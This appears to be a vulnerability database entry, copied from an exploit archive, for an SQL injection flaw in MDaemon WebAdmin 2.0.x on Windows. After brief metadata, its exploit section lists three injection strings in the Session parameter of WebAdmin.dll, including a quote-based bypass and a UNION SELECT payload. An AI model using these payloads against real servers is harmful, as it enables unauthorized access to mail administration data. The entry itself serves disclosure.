MDaemon WebAdmin 2.0.x - SQL Injection

Vulnerability ID 1055719 Vulnerability type
Published 2006-05-26 Updated 2006-05-26
CVE ID N/A CNNVD-ID N/A
Platform Windows CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/10225
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
# Exploit Title: MDaemon WebAdmin 2.0.X SQL injection
# Date: 2006/5/26
# Author: KOUSULIN
# Software Link: http://archive.altn.com/WebAdmin/Archive/2.0.8/wa208_en.exe
# Version: WebAdmin 2.0.X
# Tested on: Windows 2003
# CVE : N/A
# Code :

/WebAdmin.dll?Session='[ACCESS SQL INJ]&View=User

/WebAdmin.dll?Session='or''='&View=User  # needs an active session

/WebAdmin.dll?Session='UNION SELECT * FROM A IN 'C:\ZZZ' WHERE ''='&View=User